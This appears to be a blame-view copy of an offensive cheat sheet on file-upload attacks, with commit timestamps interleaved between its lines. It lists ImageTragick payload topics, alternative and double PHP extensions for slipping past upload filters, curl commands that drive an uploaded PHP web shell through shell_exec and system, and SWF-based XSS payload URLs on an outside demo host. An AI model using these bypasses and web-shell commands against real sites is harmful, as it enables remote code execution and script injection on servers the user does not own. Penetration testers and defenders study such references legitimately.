2016-10-18 11:13:23 +00:00
# Upload
2018-08-12 21:30:22 +00:00
2017-06-04 15:22:26 +00:00
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
2016-10-18 11:13:23 +00:00
## Exploits
2018-08-12 21:30:22 +00:00
### Image Tragik
```powershell
2016-10-18 11:13:23 +00:00
HTTP Request
Reverse Shell
Touch command
```
2018-08-12 21:30:22 +00:00
### PHP Extension
```powershell
2016-10-18 11:13:23 +00:00
.php
Less known extension
.pht
.pgif
.phtml
.shtml
Double extension
.jpeg.php
.png.php
```
2018-08-12 21:30:22 +00:00
### PNG Bypass a resize
Upload the picture and use a local file inclusion
```powershell
2016-10-18 11:13:23 +00:00
You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"
```
2016-10-18 08:01:56 +00:00
2018-08-12 21:30:22 +00:00
### JPG Bypass a resize
Upload the picture and use a local file inclusion
```powershell
2016-10-18 11:13:23 +00:00
http://localhost/test.php?c=ls
2016-10-18 08:01:56 +00:00
```
2018-08-12 21:30:22 +00:00
### XSS via SWF
2017-06-04 15:22:26 +00:00
2018-08-12 21:30:22 +00:00
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
2017-06-04 15:22:26 +00:00
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
2018-08-12 21:30:22 +00:00
```powershell
2017-06-04 15:22:26 +00:00
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘ ?js=history.go(-1)’ ,’ _self’ );}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘ invalidfileinvalidfileinvalidfile’ ,’ target’ );setTimeout(‘ alert(w.document.location);w.close();’ ,1);
```
2019-01-28 19:27:45 +00:00
### .htaccess
An .htaccess file is a way to configure the details of your website without needed to alter the server config files.
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2017-06-04 15:22:26 +00:00
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil